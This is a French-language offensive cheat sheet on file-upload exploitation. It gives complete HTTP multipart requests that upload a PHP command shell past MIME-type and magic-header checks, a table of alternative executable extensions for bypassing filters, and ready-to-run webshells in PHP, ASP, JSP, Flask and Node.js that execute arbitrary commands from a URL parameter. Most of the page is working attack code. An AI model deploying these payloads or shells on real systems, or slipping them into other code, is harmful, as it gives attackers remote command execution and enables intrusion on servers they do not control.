File Upload

2026-03-13#file-upload#webshell#bypass#web#exploitation

Vecteurs d'attaque

Tester différents types de fichiers (jpg, pdf, php, exe…)
Injecter du code dans des images
Modifier le MIME type du fichier
Upload de fichiers volumineux (DoS)

Bypass

MIME Type

Changer Content-Type: text/php en Content-Type: image/png :

POST / HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6CZGdFhAqm0hjeeA

------WebKitFormBoundary6CZGdFhAqm0hjeeA
Content-Disposition: form-data; name="input_image"; filename="cmd.php"
Content-Type: image/png

<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
------WebKitFormBoundary6CZGdFhAqm0hjeeA--

Magic Header

Ajouter GIF89a; en début de fichier pour le faire passer pour un GIF :

------WebKitFormBoundaryiXbT96o7HsUdrZoy
Content-Disposition: form-data; name="input_image"; filename="cmd.php"
Content-Type: text/php

GIF89a;
<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
------WebKitFormBoundaryiXbT96o7HsUdrZoy--

Extension Bypass

Essayer des extensions alternatives exécutables :

Langage	Extensions
PHP	`.php`, `.php2`, `.php3`, `.php4`, `.php5`, `.php7`, `.pht`, `.phtml`, `.phar`
ASP	`.asp`, `.aspx`, `.ashx`, `.asmx`, `.cer`, `.shtml`, `.cshtml`, `.vbhtml`
JSP	`.jsp`, `.jspx`, `.jsw`, `.jspf`, `.do`, `.action`

Webshells

PHP

<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
?>

http://example.com/shell.php?cmd=whoami

ASP

<% 
If Request.QueryString("cmd") <> "" Then 
    Set objShell = Server.CreateObject("WScript.Shell") 
    Set objExec = objShell.Exec(Request.QueryString("cmd")) 
    Response.Write("<pre>" & objExec.StdOut.ReadAll() & "</pre>") 
End If 
%>

JSP

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String s;
    while ((s = sI.readLine()) != null) { out.println(s); }
}
%>

Python (Flask)

import os
from flask import Flask, request

app = Flask(__name__)

@app.route('/shell', methods=['GET'])
def shell():
    cmd = request.args.get('cmd')
    if cmd:
        return f"<pre>{os.popen(cmd).read()}</pre>"
    return "<pre>No command provided</pre>"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

Node.js

const express = require('express');
const { exec } = require('child_process');
const app = express();

app.get('/shell', (req, res) => {
    const cmd = req.query.cmd;
    if (cmd) {
        exec(cmd, (error, stdout, stderr) => {
            res.send(`<pre>${error ? stderr : stdout}</pre>`);
        });
    } else {
        res.send('<pre>No command provided</pre>');
    }
});

app.listen(8080, '0.0.0.0');